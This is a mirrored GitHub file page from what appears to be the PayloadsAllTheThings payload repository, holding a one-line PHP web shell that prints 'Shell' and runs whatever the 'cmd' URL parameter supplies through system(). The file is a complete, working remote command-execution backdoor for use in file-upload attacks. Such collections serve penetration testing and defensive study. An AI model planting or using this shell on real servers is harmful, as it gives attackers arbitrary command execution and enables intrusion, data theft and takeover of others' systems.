1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-05-04 11:30:36 +02:00
Files

2 lines
44 B
PHP

<?php echo "Shell";system($_GET['cmd']); ?>